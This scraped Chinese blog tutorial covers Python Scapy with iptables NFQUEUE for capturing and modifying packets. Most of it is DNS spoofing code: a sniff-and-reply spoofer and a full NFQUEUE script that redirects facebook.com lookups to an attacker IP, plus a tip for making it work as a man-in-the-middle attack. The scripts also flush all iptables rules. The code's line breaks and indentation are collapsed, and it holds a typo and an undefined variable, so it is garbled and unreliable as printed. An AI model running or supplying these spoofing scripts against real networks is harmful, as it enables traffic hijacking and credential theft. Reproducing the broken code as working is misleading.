python使用Scapy + Nfqueue抓包并修改

2024-04-01 05:58

本文主要是介绍python使用Scapy + Nfqueue抓包并修改,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

背景1  Nfqueue

Nfqueue是iptables和ip6tables的target,这个target可以将数据包交给用户空间。比如,下面的一个iptables规则

iptables -A INPUT -j NFQUEUE --queue-num 0


那么在用户空间,可以使用libnetfilter_queue来连接到queue  0(默认)并且从内核获得该消息,然后,必须给出对这个数据包的裁决(Drop,Accept等等)

一般在iptables中的target有以下五种(ACCEPT,DROP,RETURN,QUEUE,other_chain,而NFQUEUE是QUEUE的扩展。相比于QUEUE,它可以由用户指定不同的queue number。

背景2  scapy


之前写过一篇博客Scapy基础学习
监听数据:

from scapy.all import *
def callback(pkt):if pkt.haslayer(TCP):print pkt.summary()print pkt.show()print pkt[TCP] 
sniff(filter=”port 80”, prn=callback, store=0, iface=’wlan0’)

注入数据

pkt=Ether()/IP(dst="new.ycombinator.com")/TCP()/"GET /index.html HTTP/1.0 \n\n"
send(pkt)


一个dns_spoof示例:

from scapy.all import *
def dns_spoof(pkt):redirect_to = '192.168.115.110'if pkt.haslayer(DNSQR): # DNS question recordspoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)/\UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\DNS(id=pkt[DNS].id, qd=pkt[DNS].qd, aa = 1, qr=1, \an=DNSRR(rrname=pkt[DNS].qd.qname,  ttl=10, rdata=redirect_to))send(spoofed_pkt)print 'Sent:', spoofed_pkt.summary()
sniff(filter='udp port 53', iface='wlan0', store=0, prn=dns_spoof)


Scapy + nfqueue 数据包拦截,修改和转发

1.先看一个简单的例子:
 

import nfqueue
from scapy.all import *
import os
os.system('iptables -A OUTPUT -p udp --dport 53 -j NFQUEUE')
def callback(payload):data = payload.get_data()pkt = IP(data)payload.set_verdict(nfqueue.ACCEPT)
def main():q = nfqueue.queue()q.open()q.bind(socket.AF_NET)q.set_callback(callback)q.create_queue(0)try:q.try_run() # Main loopexcept KeyboardInterrupt:q.unbind(socket.AF_INET)q.close()os.system('iptables -F')os.system('iptables -X')
main()


2.再看如何修改数据包:

import nfqueue
from scapy.all import *
import os
os.system('iptables -A OUTPUT -p udp --dport 53 -j NFQUEUE')
def callback(payload):data = payload.get_data()pkt = IP(data)if pkt.haslayer(DNSQR): # Beginning modificationspkt[IP].dst = '192.168.115.118'pkt[IP].len = len(str(pkt))pkt[UDP].len = len(str(pkt[UDP]))del pkt[IP].chksumpayload.set_verdict_modified(nfqueue.NF_ACCEPT, str(pkt), len(pkt))
def main():q = nfqueue.queue()q.open()q.bind(socket.AF_INET)q.set_callback(callback)q.create_queue(0)try:q.try_run() # Main loopexcept KeyboardInterrupt:q.unbind(socket.AF_INET)q.close()os.system('iptables -F')os.system('iptables -X')
main()


注:这里需要关注payload.set_verdict_modified(nfqueue.NF_ACCEPT, str(pkt), len(pkt)),这个是使用iptables和nfqueue来发送数据,也可以不使用set_verdict_modified()函数。在callbak里可以这样操作:


payload.set_verdict(NF_DROP) 
send(modified_packet) 

3.上一个完整的dns-sproof示例

import nfqueue
from scapy.all import *
import os
domain = 'facebook.com'
os.system('iptables -A OUTPUT -p udp --dport 53 -j NFQUEUE')
def callback(payload):data = payload.get_data()pkt = IP(data)if not pkt.haslayer(DNSQR):payload.set_verdict(nfqueue.NF_ACCEPT)else:if domain in pkt[DNS].qd.qname:spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)/\UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,\an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=10, rdata=localIP))payload.set_verdict_modified(nfqueue.NF_ACCEPT, str(spoofed_pkt), len(spoofed_pkt))print '[+] Sent spoofed packet for %s' % domain
def main():q = nfqueue.queue()q.open()q.bind(socket.AF_INET)q.set_callback(callback)q.create_queue(0)try:q.try_run() # Main loopexcept KeyboardInterrupt:q.unbind(socket.AF_INET)q.close()os.system('iptables -F')os.system('iptables -X')sys.exit('losing...')
main()

如果是中间人攻击的话,iptables规则需要修改成os.system('iptables -t nat PREROUTING -p udp --dport 53 -j NFQUEUE')才会起作用。


相关资料:

https://blog.csdn.net/wang_walfred/article/details/50475912

http://security.maruhn.com/netfilter-hacking-howto/

http://www.grep.it/RMD/05-Netfilter.pdf

http://security.maruhn.com/iptables-tutorial/x9983.html

http://bbs.chinaunix.net/thread-1939832-1-1.html

http://bbs.chinaunix.net/thread-1960139-1-1.html

http://dac01.sakura.ne.jp/projects/firewall/iptips.html

http://sourcecodebrowser.com/nfqueue-bindings/0.1/nfq__common_8c.html

http://ytliu.info/blog/2013/03/29/netfilterxue-xi-bi-ji-(er-)/

http://stackoverflow.com/questions/27244736/wrong-tcp-checksum-calculation-by-scapy

这篇关于python使用Scapy + Nfqueue抓包并修改的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/866379

相关文章

Python将博客内容html导出为Markdown格式

《Python将博客内容html导出为Markdown格式》Python将博客内容html导出为Markdown格式,通过博客url地址抓取文章,分析并提取出文章标题和内容,将内容构建成html,再转... 目录一、为什么要搞?二、准备如何搞?三、说搞咱就搞!抓取文章提取内容构建html转存markdown

Python获取中国节假日数据记录入JSON文件

《Python获取中国节假日数据记录入JSON文件》项目系统内置的日历应用为了提升用户体验,特别设置了在调休日期显示“休”的UI图标功能,那么问题是这些调休数据从哪里来呢?我尝试一种更为智能的方法:P... 目录节假日数据获取存入jsON文件节假日数据读取封装完整代码项目系统内置的日历应用为了提升用户体验,

vue使用docxtemplater导出word

《vue使用docxtemplater导出word》docxtemplater是一种邮件合并工具,以编程方式使用并处理条件、循环,并且可以扩展以插入任何内容,下面我们来看看如何使用docxtempl... 目录docxtemplatervue使用docxtemplater导出word安装常用语法 封装导出方

Linux换行符的使用方法详解

《Linux换行符的使用方法详解》本文介绍了Linux中常用的换行符LF及其在文件中的表示,展示了如何使用sed命令替换换行符,并列举了与换行符处理相关的Linux命令,通过代码讲解的非常详细,需要的... 目录简介检测文件中的换行符使用 cat -A 查看换行符使用 od -c 检查字符换行符格式转换将

Python FastAPI+Celery+RabbitMQ实现分布式图片水印处理系统

《PythonFastAPI+Celery+RabbitMQ实现分布式图片水印处理系统》这篇文章主要为大家详细介绍了PythonFastAPI如何结合Celery以及RabbitMQ实现简单的分布式... 实现思路FastAPI 服务器Celery 任务队列RabbitMQ 作为消息代理定时任务处理完整

使用Jackson进行JSON生成与解析的新手指南

《使用Jackson进行JSON生成与解析的新手指南》这篇文章主要为大家详细介绍了如何使用Jackson进行JSON生成与解析处理,文中的示例代码讲解详细,感兴趣的小伙伴可以跟随小编一起学习一下... 目录1. 核心依赖2. 基础用法2.1 对象转 jsON(序列化)2.2 JSON 转对象(反序列化)3.

Python Websockets库的使用指南

《PythonWebsockets库的使用指南》pythonwebsockets库是一个用于创建WebSocket服务器和客户端的Python库,它提供了一种简单的方式来实现实时通信,支持异步和同步... 目录一、WebSocket 简介二、python 的 websockets 库安装三、完整代码示例1.

揭秘Python Socket网络编程的7种硬核用法

《揭秘PythonSocket网络编程的7种硬核用法》Socket不仅能做聊天室,还能干一大堆硬核操作,这篇文章就带大家看看Python网络编程的7种超实用玩法,感兴趣的小伙伴可以跟随小编一起... 目录1.端口扫描器:探测开放端口2.简易 HTTP 服务器:10 秒搭个网页3.局域网游戏:多人联机对战4.

使用Python实现快速搭建本地HTTP服务器

《使用Python实现快速搭建本地HTTP服务器》:本文主要介绍如何使用Python快速搭建本地HTTP服务器,轻松实现一键HTTP文件共享,同时结合二维码技术,让访问更简单,感兴趣的小伙伴可以了... 目录1. 概述2. 快速搭建 HTTP 文件共享服务2.1 核心思路2.2 代码实现2.3 代码解读3.

Elasticsearch 在 Java 中的使用教程

《Elasticsearch在Java中的使用教程》Elasticsearch是一个分布式搜索和分析引擎,基于ApacheLucene构建,能够实现实时数据的存储、搜索、和分析,它广泛应用于全文... 目录1. Elasticsearch 简介2. 环境准备2.1 安装 Elasticsearch2.2 J